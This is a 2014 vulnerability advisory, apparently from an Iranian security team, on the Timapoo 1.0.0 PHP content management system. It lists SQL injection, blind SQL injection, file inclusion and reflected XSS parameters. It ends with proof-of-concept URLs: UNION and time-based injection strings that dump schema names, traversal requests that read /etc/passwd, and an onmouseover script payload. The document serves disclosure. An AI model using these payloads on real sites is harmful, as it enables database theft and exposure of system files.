Timapoo <= 1.0.0 Multiple Vulnerability

Htich · October 7, 2014

######################################### www.BugReport.ir ########################################

#

# Amnpardaz Security Research Team

#

# Title: Timapoo Multiple Vulnerability

# Vulnerable Version: 1.0.0 (prior versions also may be affected)

# Vendor: http://www.timapoo.ir/

# Exploitation: Remote

# Exploit: Available

# Impact: High

# Fix: N/A

###################################################################################################

####################

1. Description:

####################

Timapoo is a Content Management System in PHP language with Mysql. It is used to manage website, manage language of website and some other features.

This CMS is not open-source and is accessible for private use by the author company for designing their customer's websites.

####################

2. Vulnerabilities:

####################

2.1. Injection Flaws. SQL Injection in the "album", "la", "aq", "site", "sys" parameters.

2.1.1. Exploit:

Check the exploit/POC section.

2.2. File Inclusion Flaw.

2.2.1. Exploit:

Check the exploit/POC section.

2.3. Injection Flaws. Blind SQL Injection in the "username" (post) parameter in "pouyanweb" page and "sys"

parameter in "dynamic" page.

2.3.1. Exploit:

Check the exploit/POC section.

2.4. Cross Site Scripting (XSS). Reflected XSS attack in

"pouyanweb.php" in "ref" parameter(Get parameter),

"pouyanweb.php" in "username" parameter(post parameter),

"dynamic.php" in "album" parameter(Get parameter),

"dynamic.php" in "aq" parameter(Get parameter),

"dynamic.php" in "CatId" parameter(Get parameter),

"dynamic.php" in "date" parameter(Get parameter),

"dynamic.php" in "ref" parameter(Get parameter),

"dynamic.php" in "email" parameter(post parameter),

"dynamic.php" in "family" parameter(post parameter),

"dynamic.php" in "job" parameter(post parameter),

"dynamic.php" in "name" parameter(post parameter),

"dynamic.php" in "tel" parameter(post parameter),

"dynamic.php" in "email" parameter(post parameter),

"dynamic.php" in "address" parameter(post parameter),

"dynamic.php" in "zip" parameter(post parameter),

"dynamic.php" in "la" parameter(Get parameter),

"dynamic.php" in "pg" parameter(Get parameter),

"dynamic.php" in "site" parameter(Get parameter).

####################

3. Exploits/PoCs:

####################

3.1. POC:

http:///dynamic.php?action=show&album=-9380%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%28SELECT%20CONCAT%280x7174757571%2CIFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%2C0x7164756371%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%201%2C1%29%2CNULL%2CNULL%2CNULL%2CNULL%23&la=fa&page=&pic=DSC07040.jpg&site=main&sys=gallery

3.2. POC:

http:///Components/PollAdd.php?la=../../../../../../../../../../etc/passwd%00.jpg

http:///coms.php?dll=../../../../../../../../../../etc/passwd%00.jpg&la=

http:///pouyanweb.php?dll=../../../../../../../../../../etc/passwd%00.jpg&ip=

3.3. POC:

http:///dynamic.php?la=fa&page=&site=main&sys=1' AND 1=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),10,1))>40),BENCHMARK(5000000,MD5(0x62534242)),8893) AND 'a'='a

3.4. POC:

http:///dynamic.php?action=search&aq=1%22%20onmouseover%3dprompt%28%27ALARM!%27%29%20bad%3d%22&la=fa&site=main&sys=gallery

####################

4. Solution:

####################

Edit the source code to ensure that inputs are properly sanitized.